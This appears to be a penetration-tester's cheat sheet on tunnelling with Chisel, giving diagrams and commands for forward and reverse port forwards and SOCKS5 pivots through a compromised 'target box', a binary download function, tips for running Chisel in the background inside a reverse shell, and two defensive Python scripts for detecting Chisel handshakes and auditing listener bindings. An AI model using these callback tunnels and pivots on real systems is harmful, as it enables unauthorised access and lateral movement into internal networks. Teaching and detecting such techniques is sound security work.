Port Forwarding with Chisel
GitHub: https://github.com/jpillora/chisel
Download from the Releases Page: https://github.com/jpillora/chisel/releases
Usage
Requires a copy of the Chisel binary on:
- The target host
- The attacker's host.
Chisel also supports authentication between client and server, so that only clients holding the configured credentials can use the tunnel and unwanted connections are rejected.
Chisel Advantages
- Chisel is a portable binary that can be run on the attack box or the target
- Either party can host the chisel server on a chosen TCP port
- Because of this, there is a high amount of flexibility in situations where restrictions on connectivity exist
- No dependencies on SSH daemons on the target
- If the target is not running an SSH server, no problem
Example Data Flow
Chisel Server Running on Attack Box
CHISEL CLIENT and CHISEL SERVER establish a TCP session using HTTP web sockets
The port forwarding is secured between the two using SSH tunnels flowing through the web sockets
_____________________ _____________________
| | | |
| | ___________________________________________________ | |
| ATTACK BOX | | <<=============== | | TARGET BOX |
| | =====[SSH TUNNEL]====| [HTTP WEB SOCKET] |======[SSH TUNNEL]=====>> | |
| CHISEL SERVER | |___________________________________________________| | CHISEL CLIENT |
| | | |
|_____________________| |_____________________|
Chisel Server Running on Target
NOTE: If you plan on running the chisel server on the target, ensure the traffic is allowed through any firewalls.
CHISEL CLIENT and CHISEL SERVER establish a TCP session using HTTP web sockets
The port forwarding is secured between the two using SSH tunnels flowing through the web sockets
_____________________ _____________________
| | | |
| | ___________________________________________________ | |
| ATTACK BOX | | ===============>> | | TARGET BOX |
| | =====[SSH TUNNEL]=====| [HTTP WEB SOCKET] |=====[SSH TUNNEL]=====>> | |
| CHISEL CLIENT | |___________________________________________________| | CHISEL SERVER |
| | | |
|_____________________| |_____________________|
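The two diagrams above describe the same wire format in both directions: a plain HTTP request that is upgraded to a WebSocket, with an SSH session carried inside it. That handshake is also what a defender can look for. The following is an added example, not code from the page or from the chisel project: it parses the request line and headers of captured inbound HTTP requests (the three sample requests are constructed here) and flags WebSocket upgrades whose Sec-WebSocket-Protocol header names the chisel subprotocol. The subprotocol string `chisel-v3` is the value the chisel client advertises in its source; it is not stated on this page.

```python
import re
from typing import Dict, List

# Constructed sample captures (not real traffic): request line plus headers of three
# inbound HTTP requests, as a reverse proxy log or packet capture would show them.
SAMPLE_REQUESTS = [
    # 1. Ordinary request, no upgrade
    "GET / HTTP/1.1\r\nHost: 10.0.0.2:8080\r\nUser-Agent: Mozilla/5.0\r\n\r\n",
    # 2. WebSocket upgrade carrying the subprotocol a chisel client advertises
    "GET / HTTP/1.1\r\nHost: 10.0.0.2:8080\r\nUpgrade: websocket\r\nConnection: Upgrade\r\n"
    "Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==\r\nSec-WebSocket-Version: 13\r\n"
    "Sec-WebSocket-Protocol: chisel-v3\r\n\r\n",
    # 3. WebSocket upgrade for an unrelated application subprotocol
    "GET /chat HTTP/1.1\r\nHost: app.example.internal\r\nUpgrade: websocket\r\nConnection: Upgrade\r\n"
    "Sec-WebSocket-Key: x3JJHMbDL1EzLkh9GBhXDw==\r\nSec-WebSocket-Version: 13\r\n"
    "Sec-WebSocket-Protocol: graphql-ws\r\n\r\n",
]

CHISEL_SUBPROTOCOL = re.compile(r"^chisel-v\d+$")


def parse_headers(raw: str) -> Dict[str, str]:
    """Return the headers of one raw HTTP request, keyed by lower-cased name."""
    head = raw.split("\r\n\r\n", 1)[0]
    headers: Dict[str, str] = {}
    for line in head.split("\r\n")[1:]:          # skip the request line
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return headers


def classify_request(raw: str) -> Dict[str, object]:
    """Describe whether a request is a WebSocket upgrade and which subprotocols it offers."""
    h = parse_headers(raw)
    is_upgrade = (h.get("upgrade", "").lower() == "websocket"
                  and "upgrade" in h.get("connection", "").lower())
    subprotocols = [p.strip() for p in h.get("sec-websocket-protocol", "").split(",") if p.strip()]
    return {
        "host": h.get("host", ""),
        "websocket_upgrade": is_upgrade,
        "subprotocols": subprotocols,
        # Only an upgrade that offers the chisel subprotocol counts as a chisel handshake
        "chisel_handshake": is_upgrade and any(CHISEL_SUBPROTOCOL.match(p) for p in subprotocols),
    }


def find_chisel_handshakes(requests: List[str]) -> List[int]:
    """Indexes of the requests that look like a chisel client connecting to a chisel server."""
    return [i for i, r in enumerate(requests) if classify_request(r)["chisel_handshake"]]


if __name__ == "__main__":
    for i, req in enumerate(SAMPLE_REQUESTS):
        print(i, classify_request(req))
    print("chisel handshakes at:", find_chisel_handshakes(SAMPLE_REQUESTS))
```

The subprotocol match is a high-confidence but brittle signal, since a rebuilt client can change the string; the `websocket_upgrade` field is kept in the result so the same pass can also surface WebSocket upgrades to hosts or ports where no WebSocket application is expected.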
Example Commands
Individual Port Forwarding
NOTE: If you plan on running the chisel server on the target, ensure the traffic is allowed through any firewalls. In general, running the chisel server on the attack box is a safer bet.
Network Diagram
SCENARIO
--------
Services on TARGET BOX are listening internally on 127.0.0.1 on TCP port 8001 and TCP port 8443
Run a CHISEL SERVER ON TARGET BOX and connect to it using a CHISEL CLIENT ON ATTACK BOX
Open 127.0.0.1:8001 on attack box and port forward to 127.0.0.1:8001 on target
Open 127.0.0.1:8443 on attack box and port forward to 127.0.0.1:8443 on target
CHISEL CLIENT and CHISEL SERVER establish a TCP session using HTTP web sockets
The port forwarding is secured between the two using SSH tunnels flowing through the web sockets
_____________________ _____________________
| | | |
| | ___________________________________________________ | |
| ATTACK BOX | | ===============>> | | TARGET BOX |
| | =====[SSH TUNNEL]=====| [HTTP WEB SOCKET] |=====[SSH TUNNEL]=====>> | |
| CHISEL CLIENT | | |___________________________________________________| | | CHISEL SERVER |
| | | | | |
|_____________________| | | |_____________________|
| |
127.0.0.1:8001 ------| |-------127.0.0.1:8001
127.0.0.1:8443 ------' '-------127.0.0.1:8443
Chisel Server on Target
# Chisel server is listening on TCP port 51234
# Make sure this port is open in the firewall
/tmp/chisel server --socks5 --port 51234
Chisel Client on Attack Box
# Example shows multiple port forwards
# You can specify one or many port forwards
# Add or remove port forward declarations as needed
/tmp/chisel client target-box-ip:51234 127.0.0.1:8001:127.0.0.1:8001 127.0.0.1:8443:127.0.0.1:8443
# Each remote is attack-ip:attack-port:target-ip:target-port
# (attack-ip is the bind address of the listener opened on the attack box)
Reverse Individual Port Forwarding
- A service on a compromised host is listening on 127.0.0.1
- Run the Chisel server on the attack box in reverse mode and connect from the target
- Specify one or many reverse port forwards on the client
- Open a port on attack box and forward traffic to remote port
Network Diagram
SCENARIO
--------
Services on TARGET BOX are listening internally on 127.0.0.1 on TCP port 8001 and TCP port 8443
Run a CHISEL SERVER ON ATTACK BOX and connect to it using a CHISEL CLIENT ON TARGET BOX
Open 127.0.0.1:8001 on attack box and port forward to 127.0.0.1:8001 on target
Open 127.0.0.1:8443 on attack box and port forward to 127.0.0.1:8443 on target
CHISEL CLIENT and CHISEL SERVER establish a TCP session using HTTP web sockets
The port forwarding is secured between the two using SSH tunnels flowing through the web sockets
_____________________ _____________________
| | | |
| | ___________________________________________________ | |
| ATTACK BOX | | <<=============== | | TARGET BOX |
| | =====[SSH TUNNEL]=====| [HTTP WEB SOCKET] |=====[SSH TUNNEL]=====>> | |
| CHISEL SERVER | | |___________________________________________________| | | CHISEL CLIENT |
| | | | | |
|_____________________| | | |_____________________|
| |
127.0.0.1:8001 ------| |-------127.0.0.1:8001
127.0.0.1:8443 ------' '-------127.0.0.1:8443
Chisel Server on Attack Box
# Chisel server listening on TCP port 51234
./chisel server --reverse --port 51234
Chisel Client on Target
# Example command shows multiple port forwards
# You can specify one or many port forwards
# Add or remove port forward declarations as needed
/tmp/chisel client attack-box-ip:51234 R:8001:127.0.0.1:8001 R:8443:127.0.0.1:8443
# Each remote is R:attack-port:target-ip:target-port
# "R" marks a reverse remote: the listener is opened on the chisel server (here the attack box)
# To pin that listener to loopback, give the bind address explicitly, e.g. R:127.0.0.1:8001:127.0.0.1:8001
Forward Dynamic SOCKS Proxy
- Run the Chisel server on the target box
- Use the target box as a jump host to reach additional targets routable by the target
- The traffic flows forward to the target box, which acts as a transparent SOCKS proxy
Network Diagram
SCENARIO
--------
You have landed on a target that has access to ADDITIONAL TARGET(s) and/or ADDITIONAL ROUTE(s)
Run a CHISEL SERVER ON TARGET BOX and connect to it using a CHISEL CLIENT ON ATTACK BOX
Open 127.0.0.1:50080 on attack box and use this TCP connection as a SOCKS5 proxy
All traffic flowing through the SOCKS5 proxy will be routed by TARGET BOX to any specified destination
CHISEL CLIENT and CHISEL SERVER establish a TCP session using HTTP web sockets
The port forwarding is secured between the two using SSH tunnels flowing through the web sockets
_____________________ _____________________ _______ _______
| | | | | | | |
| | ___________________________________________________ | | | | _______ | |
| ATTACK BOX | | ===============>> | | TARGET BOX | <<===================>> ------- | | -------
| | =====[SSH TUNNEL]=====| [HTTP WEB SOCKET] |=====[SSH TUNNEL]=====>> | | -----SOCKS5 PROXY-----> | |
| CHISEL CLIENT | | |___________________________________________________| | CHISEL SERVER | <<===================>> _______ ------- _______
| | | | | | | | |
|_____________________| | |_____________________| | | | |
| ------- -------
127.0.0.1:50080------' ADDITIONAL TARGETS OR NETWORKS
Chisel Server on Target
# Chisel server is listening on TCP port 51234
# Make sure this port is open in the firewall
/tmp/chisel server --socks5 --port 51234
Chisel Client on Attack Box
# Open a single SOCKS5 proxy port on the attack box
/tmp/chisel client target-box-ip:51234 50080:socks
# Remote format: attack-port:socks
Reverse Dynamic SOCKS Proxy
- Run the Chisel server on the attack box in reverse mode
- Connect to the Chisel server from the target and specify a reverse port forward
- The traffic flows through the port on the attack box in reverse to the target box, which acts as a transparent SOCKS proxy
Network Diagram
SCENARIO
--------
You have landed on a target that has access to ADDITIONAL TARGET(s) and/or ADDITIONAL ROUTE(s)
Run a CHISEL SERVER ON ATTACK BOX and connect to it using a CHISEL CLIENT ON TARGET BOX
Open 127.0.0.1:50080 on attack box and use this TCP connection as a SOCKS5 proxy
All traffic flowing through the SOCKS5 proxy will be routed by TARGET BOX to any specified destination
CHISEL CLIENT and CHISEL SERVER establish a TCP session using HTTP web sockets
The port forwarding is secured between the two using SSH tunnels flowing through the web sockets
_____________________ _____________________ _______ _______
| | | | | | | |
| | ___________________________________________________ | | | | _______ | |
| ATTACK BOX | | <<=============== | | TARGET BOX | <<===================>> ------- | | -------
| | =====[SSH TUNNEL]=====| [HTTP WEB SOCKET] |=====[SSH TUNNEL]=====>> | | -----SOCKS5 PROXY-----> | |
| CHISEL SERVER | | |___________________________________________________| | CHISEL CLIENT | <<===================>> _______ ------- _______
| | | | | | | | |
|_____________________| | |_____________________| | | | |
| ------- -------
127.0.0.1:50080------' ADDITIONAL TARGETS OR NETWORKS
Chisel Server on Attack Box
/tmp/chisel server --reverse --port 51234
Chisel Client on Target
# Open a single SOCKS5 proxy port on the attack box
/tmp/chisel client attack-box-ip:51234 R:50080:socks
# Remote format: R:attack-port:socks
# "R" marks a reverse remote: the SOCKS5 listener is opened on the chisel server (here the attack box)
# Give the bind address explicitly (R:127.0.0.1:50080:socks) to keep the proxy port loopback-only
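The four scenarios above (individual forward and reverse port forwards, forward and reverse SOCKS) all reduce to one remote grammar, and the security-relevant detail in each is where the resulting listener is bound. As an added example, not chisel's own code, here is a Python parser for that grammar, `[R:][local-host:][local-port:][remote-host:]remote-port[/protocol]` with the `socks` form in place of the remote side, together with a review function that flags remotes whose listener would not be loopback-only. The rule that an omitted local host means all interfaces on a port forward, and the default SOCKS port 1080, are taken from the chisel README rather than from this page; the sample specs are the ones used on this page plus two constructed ones.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

PORT_RE = re.compile(r"^\d{1,5}$")
ALL_INTERFACES = {"0.0.0.0", "::", "[::]"}


@dataclass
class Remote:
    reverse: bool               # "R:" prefix: the listener is opened on the chisel server host
    socks: bool                 # the remote side is chisel's built-in SOCKS5 proxy
    local_host: Optional[str]   # bind address of the listener; None when the spec omits it
    local_port: Optional[str]
    remote_host: Optional[str]
    remote_port: Optional[str]
    protocol: str = "tcp"


def parse_remote(spec: str) -> Remote:
    """Parse one chisel remote argument, e.g. R:8001:127.0.0.1:8001 or 50080:socks.
    Fields are filled from the right, so the remote side is known before the local side
    and a lone port means 'same port on both ends'. Bracketed IPv6 literals are not handled."""
    original = spec
    reverse = spec.startswith("R:")
    if reverse:
        spec = spec[2:]
    protocol = "tcp"
    if "/" in spec:
        spec, protocol = spec.rsplit("/", 1)
    parts = [p for p in spec.split(":") if p]
    r = Remote(reverse=reverse, socks=False, local_host=None, local_port=None,
               remote_host=None, remote_port=None, protocol=protocol)
    if parts and parts[-1] == "socks":
        r.socks = True
        parts = parts[:-1]
    for p in reversed(parts):
        if PORT_RE.match(p):
            if not r.socks and r.remote_port is None:
                r.remote_port = p
            r.local_port = p            # a port further left overrides the local port
        elif not r.socks and r.remote_host is None:
            r.remote_host = p
        else:
            r.local_host = p
    if not r.socks and r.remote_port is None:
        raise ValueError(f"no port in remote spec {original!r}")
    if r.socks and r.local_port is None:
        r.local_port = "1080"           # chisel's documented default SOCKS port
    return r


def listener_warnings(r: Remote) -> List[str]:
    """Review where the listener for this remote lands and whether it is loopback-only."""
    side = "chisel server host" if r.reverse else "chisel client host"
    out: List[str] = []
    if r.local_host is None:
        out.append(f"{side}: bind address omitted; chisel's default is all interfaces, "
                   "so state 127.0.0.1 explicitly to keep the listener loopback-only")
    elif r.local_host in ALL_INTERFACES:
        out.append(f"{side}: listener bound to all interfaces ({r.local_host})")
    if r.socks:
        out.append(f"{side}: port {r.local_port} is a SOCKS5 pivot into the other host's network")
    return out


def audit(specs: List[str]) -> dict:
    """Map each remote spec to its warnings (an empty list means nothing to flag)."""
    return {s: listener_warnings(parse_remote(s)) for s in specs}


if __name__ == "__main__":
    # Specs from this page plus two constructed ones (hostname and /udp are constructed)
    for spec, warnings in audit(["127.0.0.1:8001:127.0.0.1:8001", "R:8001:127.0.0.1:8001",
                                 "50080:socks", "R:50080:socks", "R:127.0.0.1:33060:127.0.0.1:3306",
                                 "8080:example.internal:80/udp"]).items():
        print(spec, "->", warnings or "ok")
```

Run against the page's own commands, the only specs that come back clean are the ones that spell out `127.0.0.1` as the bind address, which is the form the Reverse Shell Tips section already uses.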
Bash Function to Download Chisel Binaries
I've added this function to my ~/.zshrc file so that I can just invoke the function at any time to download the Linux and Windows chisel binaries.
function download_chisel() {
    # Variables
    local download_base_url='https://github.com/jpillora/chisel/releases/download'
    local tags_base_url='https://github.com/jpillora/chisel/tags'
    local linux_output_name='chisel.gz'
    local linux32_output_name='chisel32.gz'
    local windows_output_name='chisel.exe.gz'
    local windows32_output_name='chisel32.exe.gz'
    # Newest release tag (e.g. v1.9.1) scraped from the GitHub tags page; stop if the scrape finds nothing
    local url_version binary_version
    url_version=$(curl -s "$tags_base_url" | grep 'releases/tag/v' | head -n 1 | cut -d '>' -f 3 | cut -d '<' -f 1)
    if [ -z "$url_version" ]; then
        echo "download_chisel: could not determine the latest chisel release tag" >&2
        return 1
    fi
    binary_version="${url_version#v}"
    local linux_binary_name="chisel_${binary_version}_linux_amd64.gz"
    local linux32_binary_name="chisel_${binary_version}_linux_386.gz"
    local windows_binary_name="chisel_${binary_version}_windows_amd64.gz"
    local windows32_binary_name="chisel_${binary_version}_windows_386.gz"
    local linux_download_url="${download_base_url}/${url_version}/${linux_binary_name}"
    local linux32_download_url="${download_base_url}/${url_version}/${linux32_binary_name}"
    local windows_download_url="${download_base_url}/${url_version}/${windows_binary_name}"
    local windows32_download_url="${download_base_url}/${url_version}/${windows32_binary_name}"
    # Download (-f makes curl fail on an HTTP error instead of saving an error page), extract, set mode
    curl -sfL "$linux_download_url" -o "$PWD/${linux_output_name}" || return 1
    curl -sfL "$linux32_download_url" -o "$PWD/${linux32_output_name}" || return 1
    curl -sfL "$windows_download_url" -o "$PWD/${windows_output_name}" || return 1
    curl -sfL "$windows32_download_url" -o "$PWD/${windows32_output_name}" || return 1
    gunzip -f "$linux_output_name"
    gunzip -f "$linux32_output_name"
    gunzip -f "$windows_output_name"
    gunzip -f "$windows32_output_name"
    chmod u+x ./chisel ./chisel32
    echo "Linux and Windows chisel binaries downloaded and unarchived in $PWD"
}
Reverse Shell Tips
Run Chisel in the Background
Running chisel in the foreground in a reverse shell will render your shell useless; adding these notes here as a way to work around this.
Linux
Client Mode
# Background the process with '&' and redirect its output so it does not write into the shell
# Example command
chisel client 10.0.0.2:8080 R:127.0.0.1:33060:127.0.0.1:3306 R:127.0.0.1:8800:127.0.0.1:80 > /dev/null 2>&1 &
Server Mode
# Background the process with '&' and redirect its output so it does not write into the shell
# Example command
chisel server --port 8080 --reverse > /dev/null 2>&1 &
Windows
PowerShell
Client Mode
# Use the Start-Job cmdlet with a script block
# Example command (each argument is its own list element so Start-Process passes them unchanged)
$scriptBlock = { Start-Process C:\Windows\Temp\chisel.exe -ArgumentList @('client','10.0.0.2:8080','R:127.0.0.1:33060:127.0.0.1:3306','R:127.0.0.1:8800:127.0.0.1:80') }
Start-Job -ScriptBlock $scriptBlock
Server Mode
Note that in server mode, you'll need to make sure your port is allowed through the firewall.
# Use the Start-Job cmdlet with a script block
# Example command ('--port' and its value are separate list elements so Start-Process passes them unchanged)
$scriptBlock = { Start-Process C:\Windows\Temp\chisel.exe -ArgumentList @('server','--port','50001','--socks5') }
Start-Job -ScriptBlock $scriptBlock